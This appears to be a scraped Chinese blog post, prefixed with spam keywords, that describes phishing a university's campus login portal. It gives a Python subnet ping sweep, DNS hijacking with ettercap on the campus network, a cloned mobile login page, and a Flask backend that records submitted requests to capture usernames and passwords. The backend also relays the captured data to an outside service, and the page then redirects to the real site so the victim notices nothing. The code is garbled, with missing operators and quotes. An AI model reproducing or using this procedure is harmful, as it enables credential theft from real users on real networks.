门户网站制作价格表,友情链接论坛,建行官方网站多少,专业网站制作哪家专业Hello #xff01; 我是我是小恒不会java 本文仅作为针对普通同学眼中的网络安全#xff0c;设计的钓鱼案例也是怎么简陋怎么来 注#xff1a;本文不会外传代码#xff0c;后端已停止使用#xff0c;仅作为学习使用 基本原理
内网主机扫描DNS劫持前端模拟后端… Hello 我是我是小恒不会java 本文仅作为针对普通同学眼中的网络安全设计的钓鱼案例也是怎么简陋怎么来 注本文不会外传代码后端已停止使用仅作为学习使用 基本原理
内网主机扫描DNS劫持前端模拟后端HTTP请求保存日志前端重定向至真实网站
仿制前端
原本站点网址这是作者仿制后实现的后端Flask框架打码了
https://ca.csu.edu.cn/ 内网主机扫描
import os
import platformdef ping(host):if platform.system() Windows:response os.system(ping -n 1 host)else:response os.system(ping -c 1 host)return response 0with open(active_ips.txt, w) as f:for i in range(0, 255):for j in range(0, 255):ip 100.65.{}.{}.format(i, j)if ping(ip):print({} is active.format(ip))f.write(ip \n) python太慢建议用批处理脚本。第一次写没必要就先用了 DNS劫持
准备一台kail linux主机连接校园网使用ettercap进行DNS劫持 修改/etc/ettercap/etter.dns文件根据提示按需进行劫持配置
先打开阿帕奇服务器试试可用性成功则如下图所示 前端仿制
主要是针对移动端我就只针对移动端进行特意修改
加上form表单和falsk后端匹配。设置应用的秘钥用于加密session数据。
实现一个简单的session登陆验证并向后端发送加密信息等待服务器响应
后端
def save_request_data():target_url request.json[target_url]save_path request.json[save_path]# 准备请求参数request_data {method: POST, url: target_url,headers: request.headers.to_list(), # 保存当前请求的 headers 为例data: request.get_json() }# 发送请求到 httpbin一个用于测试 HTTP 请求和响应的工具服务以获取原始请求数据response requests.post(https://httpbin.org/anything, jsonrequest_data)if response.status_code 200:# 解析 httpbin 返回的 JSON 数据提取原始请求数据raw_request_data response.json()[req]# 将原始请求数据写入文件with open(save_path, w, encodingutf-8) as f:json.dump(raw_request_data, f, ensure_asciiFalse, indent4)return jsonify({status: success, message: HTTP request data saved successfully.})else:return jsonify({status: error, message: fReceived non-successful status code {response.status_code} from the server.}), response.status_code
服务器端保存请求内容并正常返回响应从而达到获取username和password的目的 重定向
在前端点击登陆后重定向至正确网址用户只会认为网页卡顿了再次输入信息后成功登陆校园门户网络